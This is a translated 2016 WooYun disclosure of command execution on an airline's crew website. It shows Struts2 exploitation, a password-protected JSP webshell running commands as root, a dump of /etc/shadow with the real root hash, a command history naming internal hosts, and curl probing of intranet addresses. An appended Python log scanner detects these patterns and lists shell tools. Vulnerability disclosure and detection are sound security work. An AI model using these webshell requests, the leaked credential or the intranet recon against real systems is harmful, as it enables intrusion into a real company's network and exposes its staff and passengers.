

Defect ID: wooyun-2016-0198198

Title: Just a handy tool: command execution on a 9 Air site, to Getshell, to simple intranet probing

Vendor: 九元航空有限公司 (9 Air Co., Ltd.)

Author: 路人甲

Submitted: 2016-04-19 16:30

Fixed: 2016-06-03 17:10

Published: 2016-06-03 17:10

Vulnerability type: Command execution

Severity: High

Self-assessed Rank: 15

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-04-19: Details sent to the vendor, awaiting vendor handling
2016-04-19: Vendor has confirmed; details disclosed to the vendor only
2016-04-29: Details disclosed to core white hats and relevant domain experts
2016-05-09: Details disclosed to regular white hats
2016-05-19: Details disclosed to intern white hats
2016-06-03: Details disclosed to the public

Brief description:

Between a man and a woman, the man should always give way to the woman. Take me: whatever I do, I let my girlfriend have her way, like letting her do the laundry, letting her cook, letting her wash the dishes, letting her tidy the room...

Detailed description:

http://crew.9air.com:8080/9airweb/allUserMap.action
Struts2 command execution. Kid, time to apply the patch.
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow
root:$6$tt8sA3oimLmV/DQS$P2kOvG699Pl38HVdoxIU7z1BBJmTA5xjP87FS4T2VsCl42zq52UAhxhT1KyfGutLzjmZ5fZOmRFwr87CZyMlA.:16439:0:99999:7:::
bin:*:15628:0:99999:7:::
daemon:*:15628:0:99999:7:::
adm:*:15628:0:99999:7:::
lp:*:15628:0:99999:7:::
sync:*:15628:0:99999:7:::
shutdown:*:15628:0:99999:7:::
halt:*:15628:0:99999:7:::
mail:*:15628:0:99999:7:::
uucp:*:15628:0:99999:7:::
operator:*:15628:0:99999:7:::
games:*:15628:0:99999:7:::
gopher:*:15628:0:99999:7:::
ftp:*:15628:0:99999:7:::
nobody:*:15628:0:99999:7:::
dbus:!!:16439::::::
vcsa:!!:16439::::::
rpc:!!:16439:0:99999:7:::
rtkit:!!:16439::::::
avahi-autoipd:!!:16439::::::
abrt:!!:16439::::::
rpcuser:!!:16439::::::
nfsnobody:!!:16439::::::
haldaemon:!!:16439::::::
gdm:!!:16439::::::
ntp:!!:16439::::::
saslauth:!!:16439::::::
postfix:!!:16439::::::
pulse:!!:16439::::::
sshd:!!:16439::::::
tcpdump:!!:16439::::::
clamav:!!:16829::::::


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=whoami
root privileges


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=ls%20/
bin
boot
dev
etc
history.log
home
lib
lib64
logs
lost+found
media
misc
net
opt
proc
root
sbin
selinux
serverdir
shirodemo.log
shirodemo.log.2016-01-29
shirodemo.log.2016-01-30
shirodemo.log.2016-01-31
shirodemo.log.2016-02-01
shirodemo.log.2016-02-02
shirodemo.log.2016-02-03
shirodemo.log.2016-02-04
shirodemo.log.2016-02-05
shirodemo.log.2016-02-06
shirodemo.log.2016-02-07
shirodemo.log.2016-02-08
shirodemo.log.2016-02-09
shirodemo.log.2016-02-10
shirodemo.log.2016-02-11
shirodemo.log.2016-02-12
shirodemo.log.2016-02-13
shirodemo.log.2016-02-14
shirodemo.log.2016-02-15
shirodemo.log.2016-02-16
shirodemo.log.2016-02-17
shirodemo.log.2016-02-18
shirodemo.log.2016-02-19
shirodemo.log.2016-02-20
shirodemo.log.2016-02-21
shirodemo.log.2016-02-22
shirodemo.log.2016-02-23
shirodemo.log.2016-02-24
shirodemo.log.2016-02-25
shirodemo.log.2016-02-26
shirodemo.log.2016-02-27
shirodemo.log.2016-02-28
shirodemo.log.2016-02-29
shirodemo.log.2016-03-01
shirodemo.log.2016-03-02
shirodemo.log.2016-03-03
shirodemo.log.2016-03-04
shirodemo.log.2016-03-05
shirodemo.log.2016-03-06
shirodemo.log.2016-03-07
shirodemo.log.2016-03-08
shirodemo.log.2016-03-09
shirodemo.log.2016-03-10
shirodemo.log.2016-03-11
shirodemo.log.2016-03-12
shirodemo.log.2016-03-13
shirodemo.log.2016-03-14
shirodemo.log.2016-03-15
shirodemo.log.2016-03-16
shirodemo.log.2016-03-17
shirodemo.log.2016-03-18
shirodemo.log.2016-03-19
shirodemo.log.2016-03-20
shirodemo.log.2016-03-21
shirodemo.log.2016-03-22
shirodemo.log.2016-03-23
shirodemo.log.2016-03-24
shirodemo.log.2016-03-25
shirodemo.log.2016-03-26
shirodemo.log.2016-03-27
shirodemo.log.2016-03-28
shirodemo.log.2016-03-29
shirodemo.log.2016-03-30
shirodemo.log.2016-03-31
shirodemo.log.2016-04-01
shirodemo.log.2016-04-02
shirodemo.log.2016-04-03
shirodemo.log.2016-04-04
shirodemo.log.2016-04-05
shirodemo.log.2016-04-06
shirodemo.log.2016-04-07
shirodemo.log.2016-04-08
shirodemo.log.2016-04-09
shirodemo.log.2016-04-10
shirodemo.log.2016-04-11
shirodemo.log.2016-04-12
shirodemo.log.2016-04-13
shirodemo.log.2016-04-14
shirodemo.log.2016-04-15
shirodemo.log.2016-04-16
shirodemo.log.2016-04-17
shirodemo.log.2016-04-18
soft
software
srv
sys
tmp
usr
var
weixin


There is a command history file
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/history.log
Now this gets interesting.....
414 select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender
415 2015-12-09 16:16:56,603 DEBUG [java.sql.PreparedStatement] - {pstm-100145} Executing Statement: select count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender
416 [DEBUG] 2015-12-09 16:16:56,603 - {pstm-100145} Executing Statement: select
count(1) coun, oolist.o_Psg_Gender name from o_psg_list oolist inner join o_flt_inf inf on inf.o_flt_carrier = oolist.o_flt_carrier and inf.o_flt_no = oolist.o_flt_no and inf.o_flt_org_apt = oolist.o_flt_org_apt and inf.o_flt_org_date = oolist.o_flt_org_date where 1=1 and inf.o_flt_id = ? and inf.o_flt_leg_th = ? and oolist.o_et_st in('F','C') GROUP BY oolist.o_Psg_Gender 3171526575
417 tail -f catalina.out
SQL and the like; keeping these, they might be useful later....
754 ssh [email protected]
756 ssh [email protected]
The intranet looks fairly large
829 cd /
830 ls
831 cd /serverdir/
832 ls
833 cd tomcat/
834 ls
835 cd apache-tomcat-7.0.57/
836 ls
837 cd webapps/
838 ls
839 cd test/
840 ls
841 cd ..
842 rm -rf test
843 ls
844 cd 9airweb
845 ls
846 cat return_url.jsp
847 ll
848 cat index_hd.jsp
The web directory is here
Why is SafeDog (安全狗) installed?
877 tar -zxvf safedog_linux64.tar.gz
878 ll
879 cd safedog_linux64
880 ls
881 python install.py
882 service safedog status
883 python install.py


http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=cat%20/shirodemo.log.2016-04-15
All of it is database logs

Proof of vulnerability:

Looked at hosts; no intranet IPs there. So far only two IP ranges have been collected:
10.10.2.x
192.168.34.x
But the intranet looks large.
Continuing to probe.
I was going to use find to list every file in your directories... never mind....
Went straight for the crude method of probing the intranet:
curl
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.25
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.31
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.14
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.15
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.17
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.42
it works!
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.46
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.36
http://crew.9air.com:8080/9airweb/guige.jsp?pwd=222&i=curl%20192.168.34.52/wechat/WEB-INF/web.xml Found a useless xml.
Wrote a small script to scan.


[image: 粗暴的方式.png (the crude method)]

Remediation:

1. Apply the patch;
2. Delete that command history file;
3. Check the system logs to see whether the server has been compromised;
4. No need to be polite: eq-combo the ops team into the air and beat them there.
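Step 3 above is the one a defender can act on immediately. The script below is an added example, not part of the original report: it scans Tomcat access-log lines (constructed here in the common/combined format) for the two request shapes the report describes, OGNL-style payloads in parameters of Struts2 `.action` URLs and shell commands passed in a parameter of a dropped JSP webshell (the report's `guige.jsp?pwd=...&i=<command>`). The marker lists, the regexes and the sample log lines are assumptions made for this example; a production rule would be tuned against the site's real parameter names.

```python
"""Added example (not from the WooYun report): flag Struts2 OGNL-style payloads and
webshell command execution in Tomcat access-log lines. Log lines are constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Tomcat common/combined access-log line: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Shell commands seen in the report's webshell calls, plus a few close relatives (assumption).
SHELL_CMD_RE = re.compile(
    r"(^|[\s;|&])(cat|ls|whoami|curl|wget|uname|netstat|ifconfig|find)(\s|$)"
)
# Files the report shows being read through the webshell.
SENSITIVE_PATHS = ("/etc/shadow", "/etc/passwd", "history.log")
# Markers typical of OGNL injection payloads against Struts2 (heuristic, assumption).
OGNL_MARKERS = ("%{", "${", "#_memberAccess", "#context", "@java.lang.Runtime")
# RFC 1918 ranges: a command that names one of these is intranet reconnaissance.
PRIVATE_IP_RE = re.compile(
    r"\b(10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3}"
    r"|172\.(1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3})\b"
)


def classify(target):
    """Return the list of reasons a request target looks like command-execution abuse.

    parse_qs URL-decodes parameter values, so '%25%7B' becomes '%{' and
    'cat%20/etc/shadow' becomes 'cat /etc/shadow' before the checks run.
    """
    parts = urlsplit(target)
    path = parts.path
    values = [v for vs in parse_qs(parts.query, keep_blank_values=True).values() for v in vs]
    reasons = []
    if path.endswith(".action") and any(m in v for v in values for m in OGNL_MARKERS):
        reasons.append("ognl_marker_in_action_param")
    if path.endswith(".jsp") and any(
        SHELL_CMD_RE.search(v) or any(p in v for p in SENSITIVE_PATHS) for v in values
    ):
        reasons.append("shell_command_in_jsp_param")
    # Only escalate to "internal recon" when the request already looks like a command.
    if reasons and any(PRIVATE_IP_RE.search(v) for v in values):
        reasons.append("internal_address_in_command")
    return reasons


def scan(lines):
    """Parse each access-log line and collect the suspicious requests with their reasons."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line; skip rather than guess
        reasons = classify(m["target"])
        if reasons:
            findings.append({
                "ip": m["ip"], "time": m["ts"], "target": m["target"],
                "status": m["status"], "reasons": reasons,
            })
    return findings


# Constructed sample log: one benign JSP hit, one Struts2 probe with OGNL markers,
# two webshell commands (one reading /etc/shadow, one curl-ing an intranet host),
# and one benign .action request with no parameters.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Apr/2016:16:20:01 +0800] "GET /9airweb/index_hd.jsp?lang=zh HTTP/1.1" 200 5120',
    '203.0.113.7 - - [19/Apr/2016:16:21:14 +0800] "GET /9airweb/allUserMap.action?q=%25%7B%23context%7D HTTP/1.1" 200 88',
    '203.0.113.7 - - [19/Apr/2016:16:22:30 +0800] "GET /9airweb/guige.jsp?pwd=222&i=cat%20/etc/shadow HTTP/1.1" 200 1836',
    '203.0.113.7 - - [19/Apr/2016:16:23:02 +0800] "GET /9airweb/guige.jsp?pwd=222&i=curl%2010.10.2.24 HTTP/1.1" 200 412',
    '198.51.100.9 - - [19/Apr/2016:16:24:50 +0800] "GET /9airweb/allUserMap.action HTTP/1.1" 200 9201',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["time"], f["ip"], f["target"], ",".join(f["reasons"]))
```

Run it against a real `localhost_access_log.*.txt` by replacing `SAMPLE_LOG` with the file's lines; every hit on a `.jsp` that the application does not ship, repeated `.action` requests carrying `%{` or `#` markers, and any 200 response to such a request are the lines to pivot from when reconstructing the timeline the report's history.log already hints at.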

Copyright notice: when reposting, credit the source 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed at: 2016-04-19 17:06

Vendor reply:

Latest status:

None yet